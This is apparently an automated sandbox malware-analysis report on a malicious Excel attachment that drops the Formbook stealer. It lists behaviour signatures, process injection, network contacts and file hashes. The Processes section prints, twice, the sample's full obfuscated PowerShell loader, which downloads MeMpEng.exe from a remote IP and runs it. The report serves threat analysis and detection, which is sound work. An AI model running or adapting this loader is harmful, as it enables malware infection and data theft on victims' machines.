Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-m3lv1axfpd
Target PO-014842-2.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file PO-014842-2.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Process spawned unexpected child process

Formbook

Formbook payload

Downloads MZ/PE file

Blocklisted process makes network request

Evasion via Device Credential Deployment

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 10:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 10:59

Reported

2024-08-29 11:02

Platform

win7-20240704-en

Max time kernel

149s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 672 set thread context of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2940 set thread context of 1208 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 2940 set thread context of 1208 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 1532 set thread context of 1208 N/A C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NAPSTAT.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
N/A N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 592 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2208 wrote to memory of 672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2940 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1532 wrote to memory of 404 N/A C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 N/A C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 N/A C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 N/A C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8670.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC866F.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\NAPSTAT.EXE

"C:\Windows\SysWOW64\NAPSTAT.EXE"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.143:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.ommybahamabigsales.shop udp
US 8.8.8.8:53 www.laywithkemon.rest udp
US 8.8.8.8:53 www.igfloppafan.club udp

Files

memory/2092-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2092-1-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/2764-18-0x0000000002880000-0x0000000002882000-memory.dmp

memory/2092-19-0x0000000002470000-0x0000000002472000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 11aef50d0ddb441b81b4eb386f1c0626
SHA1 87eae333024929541102871faf79058cb4d9c05d
SHA256 a1c91d4d65468f77357db9407080170e53816ed8147ab17939f4d9a4069c0a2a
SHA512 307c5b5276230243de02f29e233c3103c7643988c5a10bdfbe3c8c10dec71dd725b7fdec4fbe11d8c478183f3a127e7e2d673f0898cb61608730c9af62739402

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 97ff20422f18364ef32dac00a6948fa5
SHA1 ad51613b5210699124bdbbbae46bdd112ec7fef7
SHA256 ea3e5abb29f478dad26f6365e6f2809a650bbdf2aeec0fe8fa97f9f39c476456
SHA512 8917c820e12075899419c6f3211cffed742e1bbc5d0d966b65699009b473b0168a3007854292aea65ae54edfcffc5174c5e23cb7b0fbaf9184d399eed5c24d55

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9cebf576441ef09353a6f4393089269a
SHA1 170c63f07f3442e8ff7a56f76fef8fc6c79dd8e5
SHA256 06247569f3b1d693386143b0784e19c912589bd0fafd1b466c35e3acdd204af8
SHA512 01c3f28b69ebf9566e109501c78bb0a568d82928bbd3b4bd1e54384147d8b48f3eef6b61e38706c06708d4374469a128c27625033c2f0bdeae456f35e05de3ae

C:\Users\Admin\AppData\Local\Temp\Cab80B4.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\IEnetworthUpdated[1].hta

MD5 87635cf66104074c53e698677de6002b
SHA1 958ba282403c968f0dc8631aa396b8a73612ffe3
SHA256 4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf
SHA512 7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

\??\c:\Users\Admin\AppData\Local\Temp\xcuhhq5p.cmdline

MD5 7009a4514cb2d037ed2d86e6b418b9eb
SHA1 ecf737444cbb5dfec1ad98b201a36e8d53a39886
SHA256 0437894fbc507f5dc968a935fc9688f60b0df53acb627201c3dfc5521c5abfac
SHA512 8ca52ab3425682df24a46fd3a61568bf40e71bd9dd6c6abedd78657ee4944c97e87e9185203f8da44dac608115ab7694c7abc7606ceadb92f2c0d9fea00d931e

\??\c:\Users\Admin\AppData\Local\Temp\xcuhhq5p.0.cs

MD5 f2a64cd1f09c060d9412d84239f92021
SHA1 8053849b3e79d63181b74207b19e76775a248982
SHA256 2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7
SHA512 f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

\??\c:\Users\Admin\AppData\Local\Temp\CSC866F.tmp

MD5 4383f351ce2a28e7fd56b3404e4843c3
SHA1 06295ec0aed990803a7638f2142d61acd43e4d07
SHA256 80d79dc2d210bf21c48239930e2f69d288cecbabf5d13fdc8993c8bc221f5e9f
SHA512 d7aaf9dfd21339a1843aae99a126a62d209c221ad13c9b115365974f88d19f6abac4d0722f4be42792b2d8a0b19058c58262aec0df1e58502ff84d04c5d8f0bb

C:\Users\Admin\AppData\Local\Temp\RES8670.tmp

MD5 bb2cd7c30c721194edf8a5f7fb4eed54
SHA1 465e4744f690afe7e3aa172d3ed8b8eb9ab6dd8d
SHA256 8993b586338e213234b2b95a1a55921b495ff70f7bc23eacb152f5071ed34318
SHA512 b2051c01856641649bbc9341791461f955d1434b8eeb0eb798bb95a7bf6d3f46ba8d2160e63e1bd37d075e742969555cb13ba1e1753bd330982bae61ac997535

C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.dll

MD5 ef62d9579bb4be32fcb68056a4094a89
SHA1 c0e72e5333eab292d3382f659f8e415681df8c93
SHA256 43ce75b0ecf589cd403d39d5100bd1b2934e11c173578e6960a606e6ae6cde68
SHA512 fc55b7a33921e20c8027cb522f45a9921573fb66654ff5039a91fab3e44be370fe30850cfa78a455f78b36f528c43531f8934b9c07032ba2d657178a88d288bc

C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.pdb

MD5 972195f7e5de81650fe13e91c7422d22
SHA1 1dbc2ab6ca93f16eb8ae28b2db697bdfd8dd1c83
SHA256 904ccc8912bf6bd7ab70cb92ba49057cb0217142d44e1e54c18f0bf6c35449da
SHA512 3cf33b724babd55f736e06db4a08ecf5554610efe88ba8bf84eed0529bcfdb23ea0039254139bdb47051a24ac10a9f8846a69d043f647b38cc8362c1bc09d38c

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/672-64-0x0000000001290000-0x000000000132C000-memory.dmp

memory/672-65-0x0000000000A10000-0x0000000000A28000-memory.dmp

memory/2092-66-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/672-67-0x0000000005BB0000-0x0000000005C26000-memory.dmp

memory/2940-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1208-76-0x0000000003B30000-0x0000000003C30000-memory.dmp

memory/2940-77-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1208-78-0x0000000006590000-0x00000000066E8000-memory.dmp

memory/1532-79-0x00000000008E0000-0x0000000000926000-memory.dmp

memory/1532-80-0x00000000000D0000-0x00000000000FF000-memory.dmp

memory/2092-88-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2092-91-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/1208-93-0x00000000070B0000-0x0000000007225000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 10:59

Reported

2024-08-29 11:02

Platform

win10v2004-20240802-en

Max time kernel

144s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
